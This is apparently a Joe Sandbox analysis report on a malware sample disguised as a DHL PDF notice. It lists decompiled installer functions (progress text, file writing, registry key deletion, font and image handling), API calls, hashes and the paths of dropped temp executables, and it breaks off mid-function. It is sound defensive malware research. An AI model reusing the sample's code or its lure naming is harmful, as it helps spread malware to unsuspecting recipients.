                                                            0x00404f8d
                                                            0x00404f9a
                                                            0x00404fa0
                                                            0x00404fde
                                                            0x00404fde
                                                            0x00404fed
                                                            0x00404ff4
                                                            0x00000000
                                                            0x00404ff6
                                                            0x00404fa2
                                                            0x00404fb1
                                                            0x00404fb9
                                                            0x00404fbc
                                                            0x00404fce
                                                            0x00404fd4
                                                            0x00404fdb
                                                            0x00000000
                                                            0x00404fdb
                                                            0x00000000

                                                            APIs
                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404F9A
                                                            • GetMessagePos.USER32 ref: 00404FA2
                                                            • ScreenToClient.USER32 ref: 00404FBC
                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404FCE
                                                            • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404FF4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.248820039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.248815920.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248830182.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248873061.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL_Notice_pdf.jbxd
                                                            Similarity
                                                            • API ID: Message$Send$ClientScreen
                                                            • String ID: f
                                                            • API String ID: 41195575-1993550816
                                                            • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                            • Instruction ID: ce4c7d6d39dceca23aa6ebdb29af7737867007859e7bede0b388bd4d525dd41f
                                                            • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                            • Instruction Fuzzy Hash: 3C014C71940219BADB00DBA4DD85BFEBBB8AF54711F10012BBB50B61C0D6B49A058BA5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00402F93 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E00402F93(struct HWND__* _a4, intOrPtr _a8) {
				short _v132;
				void* _t11;
				WCHAR* _t19;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t11 = E00403012();
					_t19 = L"unpacking data: %d%%";
					if( *0x42a270 == 0) {
						_t19 = L"verifying installer: %d%%";
					}
					wsprintfW( &_v132, _t19, _t11);
					SetWindowTextW(_a4,  &_v132);
					SetDlgItemTextW(_a4, 0x406,  &_v132);
				}
				return 0;
			}






                                                            0x00402fa3
                                                            0x00402fb1
                                                            0x00402fb7
                                                            0x00402fb7
                                                            0x00402fc5
                                                            0x00402fc7
                                                            0x00402fd3
                                                            0x00402fd8
                                                            0x00402fda
                                                            0x00402fda
                                                            0x00402fe5
                                                            0x00402ff5
                                                            0x00403007
                                                            0x00403007
                                                            0x0040300f

                                                            APIs
                                                            • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB1
                                                            • wsprintfW.USER32 ref: 00402FE5
                                                            • SetWindowTextW.USER32(?,?), ref: 00402FF5
                                                            • SetDlgItemTextW.USER32 ref: 00403007
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.248820039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.248815920.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248830182.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248873061.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL_Notice_pdf.jbxd
                                                            Similarity
                                                            • API ID: Text$ItemTimerWindowwsprintf
                                                            • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                            • API String ID: 1451636040-1158693248
                                                            • Opcode ID: b65fa6b26e28fa793ab4966251e07a6fe500b79f9b1e2f9c66e5bc42e84335f7
                                                            • Instruction ID: 34ad84b97f90b05cf42cbebec4ee1aaae98efe268bf46a139428006d78f28757
                                                            • Opcode Fuzzy Hash: b65fa6b26e28fa793ab4966251e07a6fe500b79f9b1e2f9c66e5bc42e84335f7
                                                            • Instruction Fuzzy Hash: 25F0497050020DABEF246F60DD49BEA3B69FB00309F00803AFA05B51D0DFBD9A559F59
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00402950 Relevance: 9.1, APIs: 6, Instructions: 91memoryfileCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 93%
                                                            			E00402950(void* __ebx) {
				WCHAR* _t26;
				void* _t29;
				long _t37;
				void* _t49;
				void* _t52;
				void* _t54;
				void* _t56;
				void* _t59;
				void* _t60;
				void* _t61;

				_t49 = __ebx;
				_t52 = 0xfffffd66;
				_t26 = E00402DA6(0xfffffff0);
				_t55 = _t26;
				 *(_t61 - 0x40) = _t26;
				if(E00405FAE(_t26) == 0) {
					E00402DA6(0xffffffed);
				}
				E00406133(_t55);
				_t29 = E00406158(_t55, 0x40000000, 2);
				 *(_t61 + 8) = _t29;
				if(_t29 != 0xffffffff) {
					 *(_t61 - 0x38) =  *(_t61 - 0x2c);
					if( *(_t61 - 0x28) != _t49) {
						_t37 =  *0x42a274;
						 *(_t61 - 0x44) = _t37;
						_t54 = GlobalAlloc(0x40, _t37);
						if(_t54 != _t49) {
							E004035F8(_t49);
							E004035E2(_t54,  *(_t61 - 0x44));
							_t59 = GlobalAlloc(0x40,  *(_t61 - 0x28));
							 *(_t61 - 0x10) = _t59;
							if(_t59 != _t49) {
								E00403371(_t51,  *(_t61 - 0x2c), _t49, _t59,  *(_t61 - 0x28));
								while( *_t59 != _t49) {
									_t51 =  *_t59;
									_t60 = _t59 + 8;
									 *(_t61 - 0x3c) =  *_t59;
									E00406113( *((intOrPtr*)(_t59 + 4)) + _t54, _t60,  *_t59);
									_t59 = _t60 +  *(_t61 - 0x3c);
								}
								GlobalFree( *(_t61 - 0x10));
							}
							E0040620A( *(_t61 + 8), _t54,  *(_t61 - 0x44));
							GlobalFree(_t54);
							 *(_t61 - 0x38) =  *(_t61 - 0x38) | 0xffffffff;
						}
					}
					_t52 = E00403371(_t51,  *(_t61 - 0x38),  *(_t61 + 8), _t49, _t49);
					CloseHandle( *(_t61 + 8));
				}
				_t56 = 0xfffffff3;
				if(_t52 < _t49) {
					_t56 = 0xffffffef;
					DeleteFileW( *(_t61 - 0x40));
					 *((intOrPtr*)(_t61 - 4)) = 1;
				}
				_push(_t56);
				E00401423();
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t61 - 4));
				return 0;
			}













                                                            0x00402950
                                                            0x00402952
                                                            0x00402957
                                                            0x0040295c
                                                            0x0040295f
                                                            0x00402969
                                                            0x0040296d
                                                            0x0040296d
                                                            0x00402973
                                                            0x00402980
                                                            0x00402988
                                                            0x0040298b
                                                            0x00402997
                                                            0x0040299a
                                                            0x004029a0
                                                            0x004029ae
                                                            0x004029b3
                                                            0x004029b7
                                                            0x004029ba
                                                            0x004029c3
                                                            0x004029cf
                                                            0x004029d3
                                                            0x004029d6
                                                            0x004029e0
                                                            0x004029ff
                                                            0x004029e7
                                                            0x004029ec
                                                            0x004029f4
                                                            0x004029f7
                                                            0x004029fc
                                                            0x004029fc
                                                            0x00402a06
                                                            0x00402a06
                                                            0x00402a13
                                                            0x00402a19
                                                            0x00402a1f
                                                            0x00402a1f
                                                            0x004029b7
                                                            0x00402a33
                                                            0x00402a35
                                                            0x00402a35
                                                            0x00402a3f
                                                            0x00402a40
                                                            0x00402a44
                                                            0x00402a48
                                                            0x00402a4e
                                                            0x00402a4e
                                                            0x00402a55
                                                            0x004022f1
                                                            0x00402c2d
                                                            0x00402c39

                                                            APIs
                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
                                                            • GlobalFree.KERNEL32 ref: 00402A06
                                                            • GlobalFree.KERNEL32 ref: 00402A19
                                                            • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A35
                                                            • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.248820039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.248815920.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248830182.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248873061.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL_Notice_pdf.jbxd
                                                            Similarity
                                                            • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                            • String ID:
                                                            • API String ID: 2667972263-0
                                                            • Opcode ID: cc682eb677fc0cdddcbf9664361c627099a0f91e8e9c012db3e8b517a211182c
                                                            • Instruction ID: 78b93316678d616cb595922dcd62a83f4062aa2fb33f08fb70827f98fa9650ab
                                                            • Opcode Fuzzy Hash: cc682eb677fc0cdddcbf9664361c627099a0f91e8e9c012db3e8b517a211182c
                                                            • Instruction Fuzzy Hash: E131B171D00124BBCF216FA9CE89D9EBE79AF09364F10023AF461762E1CB794D429B58
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00404E71 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 77%
                                                            			E00404E71(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v68;
				char _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t23;
				signed int _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t44;
				signed int _t46;
				signed int _t50;
				signed int _t52;
				signed int _t53;
				signed int _t55;

				_t23 = _a16;
				_t53 = _a12;
				_t44 = 0xffffffdc;
				if(_t23 == 0) {
					_push(0x14);
					_pop(0);
					_t24 = _t53;
					if(_t53 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t44 = 0xffffffdd;
					}
					if(_t53 < 0x400) {
						_t44 = 0xffffffde;
					}
					if(_t53 < 0xffff3333) {
						_t52 = 0x14;
						asm("cdq");
						_t24 = 1 / _t52 + _t53;
					}
					_t25 = _t24 & 0x00ffffff;
					_t55 = _t24 >> 0;
					_t46 = 0xa;
					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
				} else {
					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
					_t50 = 0;
				}
				_t31 = E004066A5(_t44, _t50, _t55,  &_v68, 0xffffffdf);
				_t33 = E004066A5(_t44, _t50, _t55,  &_v132, _t44);
				_t34 = E004066A5(_t44, _t50, 0x423748, 0x423748, _a8);
				wsprintfW(_t34 + lstrlenW(0x423748) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
				return SetDlgItemTextW( *0x429238, _a4, 0x423748);
			}



















                                                            0x00404e7a
                                                            0x00404e7f
                                                            0x00404e87
                                                            0x00404e88
                                                            0x00404e95
                                                            0x00404e9d
                                                            0x00404e9e
                                                            0x00404ea0
                                                            0x00404ea2
                                                            0x00404ea4
                                                            0x00404ea7
                                                            0x00404ea7
                                                            0x00404eae
                                                            0x00404eb4
                                                            0x00404eb4
                                                            0x00404ebb
                                                            0x00404ec2
                                                            0x00404ec5
                                                            0x00404ec8
                                                            0x00404ec8
                                                            0x00404ecc
                                                            0x00404edc
                                                            0x00404ede
                                                            0x00404ee1
                                                            0x00404e8a
                                                            0x00404e8a
                                                            0x00404e91
                                                            0x00404e91
                                                            0x00404ee9
                                                            0x00404ef4
                                                            0x00404f0a
                                                            0x00404f1b
                                                            0x00404f37

                                                            APIs
                                                            • lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F12
                                                            • wsprintfW.USER32 ref: 00404F1B
                                                            • SetDlgItemTextW.USER32 ref: 00404F2E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.248820039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.248815920.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248830182.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248873061.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL_Notice_pdf.jbxd
                                                            Similarity
                                                            • API ID: ItemTextlstrlenwsprintf
                                                            • String ID: %u.%u%s%s$H7B
                                                            • API String ID: 3540041739-107966168
                                                            • Opcode ID: 9c55475845004576d56970086a3160dc1853a6ea3782dd039902276dcfc99cf4
                                                            • Instruction ID: 20619224473e8c08b4fba53027c62ddcf1c3fef784a2ba69f514aa474de30786
                                                            • Opcode Fuzzy Hash: 9c55475845004576d56970086a3160dc1853a6ea3782dd039902276dcfc99cf4
                                                            • Instruction Fuzzy Hash: 1A11D8736041283BDB00A5ADDC45E9F3298AB81338F150637FA26F61D1EA79882182E8
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00402EA9 Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 48%
                                                            			E00402EA9(void* __eflags, void* _a4, short* _a8, signed int _a12) {
				void* _v8;
				int _v12;
				short _v536;
				void* _t27;
				signed int _t33;
				intOrPtr* _t35;
				signed int _t45;
				signed int _t46;
				signed int _t47;

				_t46 = _a12;
				_t47 = _t46 & 0x00000300;
				_t45 = _t46 & 0x00000001;
				_t27 = E004064D5(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
				if(_t27 == 0) {
					if((_a12 & 0x00000002) == 0) {
						L3:
						_push(0x105);
						_push( &_v536);
						_push(0);
						while(RegEnumKeyW(_v8, ??, ??, ??) == 0) {
							__eflags = _t45;
							if(__eflags != 0) {
								L10:
								RegCloseKey(_v8);
								return 0x3eb;
							}
							_t33 = E00402EA9(__eflags, _v8,  &_v536, _a12);
							__eflags = _t33;
							if(_t33 != 0) {
								break;
							}
							_push(0x105);
							_push( &_v536);
							_push(_t45);
						}
						RegCloseKey(_v8);
						_t35 = E00406A35(3);
						if(_t35 != 0) {
							return  *_t35(_a4, _a8, _t47, 0);
						}
						return RegDeleteKeyW(_a4, _a8);
					}
					_v12 = 0;
					if(RegEnumValueW(_v8, 0,  &_v536,  &_v12, 0, 0, 0, 0) != 0x103) {
						goto L10;
					}
					goto L3;
				}
				return _t27;
			}












                                                            0x00402eb4
                                                            0x00402ebd
                                                            0x00402ec6
                                                            0x00402ed2
                                                            0x00402edb
                                                            0x00402ee5
                                                            0x00402f0a
                                                            0x00402f10
                                                            0x00402f15
                                                            0x00402f16
                                                            0x00402f46
                                                            0x00402f1f
                                                            0x00402f21
                                                            0x00402f71
                                                            0x00402f74
                                                            0x00000000
                                                            0x00402f7a
                                                            0x00402f30
                                                            0x00402f35
                                                            0x00402f37
                                                            0x00000000
                                                            0x00000000
                                                            0x00402f3f
                                                            0x00402f44
                                                            0x00402f45
                                                            0x00402f45
                                                            0x00402f52
                                                            0x00402f5a
                                                            0x00402f61
                                                            0x00000000
                                                            0x00402f8a
                                                            0x00000000
                                                            0x00402f69
                                                            0x00402ef5
                                                            0x00402f08
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00402f08
                                                            0x00402f90

                                                            APIs
                                                            • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402EFD
                                                            • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
                                                            • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F52
                                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
                                                            • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F74
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.248820039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.248815920.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248830182.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248873061.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL_Notice_pdf.jbxd
                                                            Similarity
                                                            • API ID: CloseEnum$DeleteValue
                                                            • String ID:
                                                            • API String ID: 1354259210-0
                                                            • Opcode ID: 2f5760c81b9bdb573da93a40119b3bcbbfe2770e9a6cbc48a05e82d61b54c679
                                                            • Instruction ID: 37c7ba0f9c491dd7f389852fcb35a119484072d927876f68e32cbd91f0a54eef
                                                            • Opcode Fuzzy Hash: 2f5760c81b9bdb573da93a40119b3bcbbfe2770e9a6cbc48a05e82d61b54c679
                                                            • Instruction Fuzzy Hash: 6D216B7150010ABBDF11AF94CE89EEF7B7DEB50384F110076F909B21E0D7B49E54AA68
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00401D81 Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 77%
                                                            			E00401D81(void* __ebx, void* __edx) {
				struct HWND__* _t30;
				WCHAR* _t38;
				void* _t48;
				void* _t53;
				signed int _t55;
				signed int _t60;
				long _t63;
				void* _t65;

				_t53 = __ebx;
				if(( *(_t65 - 0x23) & 0x00000001) == 0) {
					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x28));
				} else {
					E00402D84(2);
					 *((intOrPtr*)(__ebp - 0x10)) = __edx;
				}
				_t55 =  *(_t65 - 0x24);
				 *(_t65 + 8) = _t30;
				_t60 = _t55 & 0x00000004;
				 *(_t65 - 0x38) = _t55 & 0x00000003;
				 *(_t65 - 0x18) = _t55 >> 0x1f;
				 *(_t65 - 0x40) = _t55 >> 0x0000001e & 0x00000001;
				if((_t55 & 0x00010000) == 0) {
					_t38 =  *(_t65 - 0x2c) & 0x0000ffff;
				} else {
					_t38 = E00402DA6(0x11);
				}
				 *(_t65 - 0x44) = _t38;
				GetClientRect( *(_t65 + 8), _t65 - 0x60);
				asm("sbb esi, esi");
				_t63 = LoadImageW( ~_t60 &  *0x42a260,  *(_t65 - 0x44),  *(_t65 - 0x38),  *(_t65 - 0x58) *  *(_t65 - 0x18),  *(_t65 - 0x54) *  *(_t65 - 0x40),  *(_t65 - 0x24) & 0x0000fef0);
				_t48 = SendMessageW( *(_t65 + 8), 0x172,  *(_t65 - 0x38), _t63);
				if(_t48 != _t53 &&  *(_t65 - 0x38) == _t53) {
					DeleteObject(_t48);
				}
				if( *((intOrPtr*)(_t65 - 0x30)) >= _t53) {
					_push(_t63);
					E004065AF();
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t65 - 4));
				return 0;
			}











                                                            0x00401d81
                                                            0x00401d85
                                                            0x00401d9a
                                                            0x00401d87
                                                            0x00401d89
                                                            0x00401d8f
                                                            0x00401d8f
                                                            0x00401da0
                                                            0x00401da3
                                                            0x00401dad
                                                            0x00401db0
                                                            0x00401db8
                                                            0x00401dc9
                                                            0x00401dcc
                                                            0x00401dd7
                                                            0x00401dce
                                                            0x00401dd0
                                                            0x00401dd0
                                                            0x00401ddb
                                                            0x00401de5
                                                            0x00401e0c
                                                            0x00401e1b
                                                            0x00401e29
                                                            0x00401e31
                                                            0x00401e39
                                                            0x00401e39
                                                            0x00401e42
                                                            0x00401e48
                                                            0x00402ba4
                                                            0x00402ba4
                                                            0x00402c2d
                                                            0x00402c39

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.248820039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.248815920.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248830182.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248873061.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL_Notice_pdf.jbxd
                                                            Similarity
                                                            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                            • String ID:
                                                            • API String ID: 1849352358-0
                                                            • Opcode ID: 100b3177012869429c2005611ce111630833f28d1ab152a2d5a2575cfc39775b
                                                            • Instruction ID: 4d725fdcf847a80329c23b38d7164c003567f542edd6fcacfb34c9ebeef40da9
                                                            • Opcode Fuzzy Hash: 100b3177012869429c2005611ce111630833f28d1ab152a2d5a2575cfc39775b
                                                            • Instruction Fuzzy Hash: 67212672904119AFCB05CBA4DE45AEEBBB5EF08304F14003AF945F62A0CB389951DB98
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00401E4E Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 73%
                                                            			E00401E4E(intOrPtr __edx) {
				void* __edi;
				int _t9;
				signed char _t15;
				struct HFONT__* _t18;
				intOrPtr _t30;
				void* _t31;
				struct HDC__* _t33;
				void* _t35;

				_t30 = __edx;
				_t33 = GetDC( *(_t35 - 8));
				_t9 = E00402D84(2);
				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
				0x40cdf8->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t33, 0x5a), 0x48));
				ReleaseDC( *(_t35 - 8), _t33);
				 *0x40ce08 = E00402D84(3);
				_t15 =  *((intOrPtr*)(_t35 - 0x20));
				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
				 *0x40ce0f = 1;
				 *0x40ce0c = _t15 & 0x00000001;
				 *0x40ce0d = _t15 & 0x00000002;
				 *0x40ce0e = _t15 & 0x00000004;
				E004066A5(_t9, _t31, _t33, 0x40ce14,  *((intOrPtr*)(_t35 - 0x2c)));
				_t18 = CreateFontIndirectW(0x40cdf8);
				_push(_t18);
				_push(_t31);
				E004065AF();
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}











                                                            0x00401e4e
                                                            0x00401e59
                                                            0x00401e5b
                                                            0x00401e68
                                                            0x00401e7f
                                                            0x00401e84
                                                            0x00401e91
                                                            0x00401e96
                                                            0x00401e9a
                                                            0x00401ea5
                                                            0x00401eac
                                                            0x00401ebe
                                                            0x00401ec4
                                                            0x00401ec9
                                                            0x00401ed3
                                                            0x00402638
                                                            0x0040156d
                                                            0x00402ba4
                                                            0x00402c2d
                                                            0x00402c39

                                                            APIs
                                                            • GetDC.USER32(?), ref: 00401E51
                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                                                            • MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
                                                            • ReleaseDC.USER32 ref: 00401E84
                                                              • Part of subcall function 004066A5: lstrcatW.KERNEL32("C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe" C:\Users\user\AppData\Local\Temp\thztifyh.t,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
                                                              • Part of subcall function 004066A5: lstrlenW.KERNEL32("C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe" C:\Users\user\AppData\Local\Temp\thztifyh.t,00000000,00422728,?,00405701,00422728,00000000), ref: 004068A4
                                                            • CreateFontIndirectW.GDI32(0040CDF8), ref: 00401ED3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.248820039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.248815920.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248830182.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248873061.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL_Notice_pdf.jbxd
                                                            Similarity
                                                            • API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
                                                            • String ID:
                                                            • API String ID: 2584051700-0
                                                            • Opcode ID: da8e727cde32dbac5ba0c7db49ef74d213bcb2a0e3f4fe6d3c107a90d4fe1e84
                                                            • Instruction ID: b9cc094806d22c325402cb6ccb5f5134c2025175c414775df3ff87de861ccae2
                                                            • Opcode Fuzzy Hash: da8e727cde32dbac5ba0c7db49ef74d213bcb2a0e3f4fe6d3c107a90d4fe1e84
                                                            • Instruction Fuzzy Hash: 8401B571900241EFEB005BB4EE89A9A3FB0AB15301F208939F541B71D2C6B904459BED
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00401C43 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 59%
                                                            			E00401C43(intOrPtr __edx) {
				int _t29;
				long _t30;
				signed int _t32;
				WCHAR* _t35;
